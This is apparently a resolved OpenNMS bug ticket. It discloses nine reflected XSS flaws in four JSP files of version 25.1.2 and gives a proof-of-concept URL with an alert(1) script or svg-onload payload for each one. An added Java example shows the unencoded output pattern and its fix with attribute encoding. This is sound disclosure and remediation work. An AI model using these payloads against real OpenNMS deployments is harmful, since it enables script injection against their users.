Details

    • Type: Sub-task
    • Status: Resolved
    • Priority: Major
    • Resolution: Fixed
    • Affects Version/s: None
    • Fix Version/s: 26.0.0
    • Component/s: None
    • Security Level: Default (Default Security Scheme)
    • Labels:
      None
    • Sprint:
      Horizon 2020 - March 18th, Horizon 2020 - April 1st

Description

## Reflected Cross-Site Scripting

We found 9 reflected XSS issues in the following files of OpenNMS 25.1.2:

load-assets.jsp:
https://github.com/OpenNMS/opennms/blob/master/core/web-assets/src/main/assets/static/load-assets.jsp
resultsIndexNoCount.jsp:
https://github.com/OpenNMS/opennms/blob/master/opennms-webapp/src/main/webapp/includes/resultsIndexNoCount.jsp
resultsIndex.jsp:
https://github.com/OpenNMS/opennms/blob/master/opennms-webapp/src/main/webapp/includes/resultsIndex.jsp
notification-box.jsp:
https://github.com/OpenNMS/opennms/blob/master/opennms-webapp/src/main/webapp/includes/notification-box.jsp

### 1. load-assets.jsp

There are 2 reflected XSS issues in the file `load-assets.jsp`. Both issues can be triggered without authentication.

The first issue can be exploited via the GET parameter `asset-async` by accessing the following URL:
`http://192.168.56.102:8980/opennms/assets/load-assets.jsp?asset-async=a%22%3Ealert(1)//&asset-media=b&asset-defer=true&asset=vaadin-theme&asset=print.js&asset-type=js`

The second issue can be exploited via the GET parameter `asset-media` by accessing the following URL:
`http://192.168.56.102:8980/opennms/assets/load-assets.jsp?asset-async=&asset-media=b%22%3E%3Cscript%3Ealert(1)%3C/script%3E&asset-defer=true&asset=vaadin-theme&asset=print&asset-type=css`

### 2. resultsIndexNoCount.jsp

There are 3 XSS issues in the file `resultsIndexNoCount.jsp`. These issues require the victim to be authenticated.

The first issue can be exploited via the GET parameter `multiplename` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndexNoCount.jsp?itemCount=10&baseurl=2%22&multiplename=test%22%3E%3Csvg/onload=alert(1)%3E&multiple=1`

The second issue can be exploited via the GET parameter `limitname` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndexNoCount.jsp?itemCount=10&baseurl=2%22&limitname=test%22%3E%3Csvg/onload=alert(1)%3E&multiple=1`

The third issue can be exploited via the GET parameter `baseurl` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndexNoCount.jsp?itemCount=10&baseurl=test%22%3E%3Csvg/onload=alert(1)%3E&multiple=1`

### 3. resultsIndex.jsp

There are 3 XSS issues in the file `resultsIndex.jsp`. These issues require the victim to be authenticated.

The first issue can be exploited via the GET parameter `multiplename` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndex.jsp?count=10&baseurl=test&limit=9&multiplename=a%22%3E%3Csvg/onload=alert(1)%3E`

The second issue can be exploited via the GET parameter `limitname` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndex.jsp?count=10&baseurl=test&limit=9&limitname=a%22%3E%3Csvg/onload=alert(1)%3E`

The third issue can be exploited via the GET parameter `baseurl` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/resultsIndex.jsp?count=10&baseurl=test%22%3E%3Csvg/onload=alert(1)%3E&limit=9`

### 4. notification-box.jsp

There is 1 XSS issue in the file `notification-box.jsp`; it can be triggered via the GET parameter `node` by accessing the following URL:
`http://192.168.56.102:8980/opennms/includes/notification-box.jsp?node=tset%22%3E%3Csvg/onload=alert(1)%3E`

Information about fixing XSS issues can be found here:

https://owasp.org/www-project-cheat-sheets/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
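The following is an added example, not OpenNMS code and not the fix that shipped in 26.0.0. It shows the class of defect behind these reports and the mitigation the OWASP cheat sheet prescribes: a request parameter written into markup unencoded, next to the same output with encoding chosen for the HTML attribute context it lands in. The class and method names, the `<input>` markup and the parameter map are assumptions; the sample value is the decoded form of the `baseurl` payload from the report.

```java
import java.util.Map;

// Hypothetical servlet-style rendering helper (added example, not OpenNMS code).
public class ReflectedParamEncoding {

    // Minimal HTML attribute encoder for the characters that can close a
    // double-quoted attribute or open a tag. In a real project prefer the
    // OWASP Java Encoder (org.owasp.encoder.Encode.forHtmlAttribute) or
    // JSTL's <c:out>, which escapes XML by default, rather than a hand-rolled one.
    static String encodeForHtmlAttribute(String s) {
        if (s == null) {
            return "";
        }
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // Vulnerable pattern: the parameter is concatenated straight into markup.
    // This reproduces the bug class in the report, not the actual JSP source.
    static String renderUnsafe(Map<String, String> params) {
        return "<input type=\"hidden\" name=\"baseurl\" value=\""
                + params.get("baseurl") + "\">";
    }

    // Fixed pattern: identical markup, parameter encoded for the attribute context.
    static String renderSafe(Map<String, String> params) {
        return "<input type=\"hidden\" name=\"baseurl\" value=\""
                + encodeForHtmlAttribute(params.get("baseurl")) + "\">";
    }

    public static void main(String[] args) {
        // Constructed input: the URL-decoded baseurl value from the report.
        Map<String, String> params = Map.of("baseurl", "test\"><svg/onload=alert(1)>");

        String unsafe = renderUnsafe(params);
        String safe = renderSafe(params);
        System.out.println("unsafe: " + unsafe);
        System.out.println("safe:   " + safe);

        // The unsafe output carries a raw <svg> tag outside the attribute; the
        // encoded output keeps the whole value inside the quoted attribute.
        if (!unsafe.contains("<svg")) {
            throw new IllegalStateException("expected the unsafe rendering to contain a raw tag");
        }
        if (safe.contains("<svg") || safe.contains("\"><")) {
            throw new IllegalStateException("encoded rendering still allows attribute break-out");
        }
    }
}
```

Two points a reviewer of the real fix would check: the encoder must match the output context (attribute encoding does nothing for a value reflected inside a `<script>` block, which needs JavaScript-string encoding), and a value that ends up in a URL attribute such as `href` additionally needs its scheme validated, because attribute encoding alone does not stop a `javascript:` URL.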

People

Assignee:
patrick.schweizer Patrick Schweizer
Reporter:
patrick.schweizer Patrick Schweizer
Votes:
0
Watchers:
2